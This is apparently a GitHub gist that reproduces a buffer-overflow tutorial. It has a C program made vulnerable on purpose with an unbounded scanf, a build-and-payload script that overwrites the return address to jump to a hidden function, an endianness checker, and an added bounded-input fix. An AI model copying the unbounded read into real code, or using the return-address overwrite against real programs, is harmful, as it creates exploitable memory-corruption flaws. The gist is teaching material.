@CreaturePhil
Last active August 19, 2017 04:52
buffer overflow exploit
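endian.c
#include <stdio.h>

int main() {
    int a = 0x12345678;
    /* Inspect the lowest-addressed byte of a. */
    unsigned char *c = (unsigned char*)(&a);
    if (*c == 0x78) {
        /* Least significant byte is stored first. */
        printf("little-endian\n");
    } else {
        printf("big-endian\n");
    }
    return 0;
}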
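exploit.c
#include <stdio.h>

/* Never called by the program's normal control flow. */
void secret_function()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];
    printf("Enter some text:\n");
    /* Deliberately vulnerable: "%s" has no field width, so input longer
     * than 19 characters is written past the end of buffer. */
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main(void)
{
    echo();
    return 0;
}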
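vuln.sh
# -fno-stack-protector builds the binary without stack canaries
gcc exploit.c -o vuln -fno-stack-protector
# print "..." is Python 2 syntax
python -c 'print "a"*40 + "\xd6\x05\x40\x00\x00\x00\x00"' | ./vuln
# note: "a" here can be any character; all it does is add 40 bytes of padding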
CreaturePhil commented Aug 19, 2017

This is from https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/. The above snippets are for a 64-bit example.

Use endian.c to determine whether your computer is little- or big-endian. If it is different, then change the order of the bytes in vuln.sh.
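
A bounded replacement for the unbounded `scanf("%s", buffer)` in `echo()` from exploit.c, as an added example that is not part of the gist or the linked blog post. It reads a whole line rather than a whitespace-delimited token and rejects input that does not fit; `BUF_SIZE`, `read_line_bounded` and `read_from_bytes` are names assumed here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 20 /* same capacity as buffer[] in the page's echo() */
enum read_status { READ_EOF = -1, READ_OK = 0, READ_TOO_LONG = 1 };

/* Read one line into buf, never writing more than cap bytes.
 * A line that does not fit is drained and rejected, not truncated. */
enum read_status read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return READ_EOF;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';            /* whole line fit: strip the newline */
        return READ_OK;
    }
    int ch = fgetc(in);                 /* no newline stored: look at what follows */
    if (ch == EOF || ch == '\n')
        return READ_OK;                 /* line ended exactly at capacity */
    while (ch != EOF && ch != '\n')     /* discard the rest of the long line */
        ch = fgetc(in);
    buf[0] = '\0';
    return READ_TOO_LONG;
}

/* Hypothetical helper: feed constructed bytes to the reader via a temp file. */
enum read_status read_from_bytes(const char *data, size_t n, char *buf, size_t cap)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return READ_EOF;
    fwrite(data, 1, n, f);
    rewind(f);
    enum read_status st = read_line_bounded(f, buf, cap);
    fclose(f);
    return st;
}

int main(void)
{
    char buffer[BUF_SIZE];
    printf("Enter some text:\n");
    if (read_line_bounded(stdin, buffer, sizeof buffer) == READ_OK)
        printf("You entered: %s\n", buffer);
    else
        printf("Rejected: no input, or longer than %d characters\n", BUF_SIZE - 1);
    return 0;
}
```

Building this version with the compiler's default stack protector, instead of `-fno-stack-protector`, adds a second layer if a bounds check is ever missed elsewhere.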
